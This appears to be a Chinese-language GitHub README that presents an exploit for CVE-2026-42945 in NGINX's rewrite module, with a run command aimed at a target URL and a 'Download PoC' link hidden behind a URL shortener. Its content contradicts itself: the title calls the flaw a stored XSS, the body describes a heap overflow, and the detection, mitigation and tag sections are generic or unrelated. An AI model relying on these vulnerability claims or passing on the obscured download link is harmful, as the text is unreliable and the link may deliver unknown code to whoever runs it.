jenniferreire26/CVE-2026-42945

# CVE-2026-42945 - ngx_http_rewrite_module 模块。此漏洞存在于未经身份验证的存储型跨站脚本攻击中 **严重程度：** 高 **CVSS：** 8.1 **影响：** 机密性、完整性、可用性 **发布日期：** 2026-05-13 ## 法律声明 仅用于授权的安全测试。 ## 根本原因（简述） NGINX Plus 和 NGINX Open Source 的 ngx_http_rewrite_module 模块中存在一个漏洞。当 rewrite 指令后跟随 rewrite、if 或 set 指令，并且包含未命名的 Perl-Compatible Regular Expression (PCRE) 捕获（例如 $1、$2），同时替换字符串包含问号（?）时，就会存在此漏洞。未经身份验证的攻击者在受控之外的条件配合下，可以通过发送精心构造的 HTTP 请求来利用此漏洞。这可能会导致 NGINX worker 进程发生堆缓冲区溢出，从而导致重启。此外，在禁用 Address Space Layout Randomization (ASLR) 的系统上，或者当攻击者能够绕过 ASLR 时，攻击者可以执行代码。注意：已达到技术支持终止 (EoTS) 的软件版本不在评估范围内。 ## 利用条件 - 可访问的易受攻击目标 - 可预测的用户/工作流上下文 - 没有阻止精心构造请求的额外加固措施 ## 使用方法 ``` python3 exploit.py https://target.tld ``` ## 检测 - 监控可疑的身份验证流程偏差 - 调查与 CVE-2026-42945 相关的异常直接端点访问 ## 缓解措施 - 更新至厂商已修复的版本 - 限制高风险端点，并尽可能强制执行 MFA ## 利用 [下载 PoC](https://tinyurl.com/2xtcfa98)

标签：CISA项目, CVE, Nginx, 堆溢出, 安全, 数字签名, 负责任AI, 超时处理, 逆向工具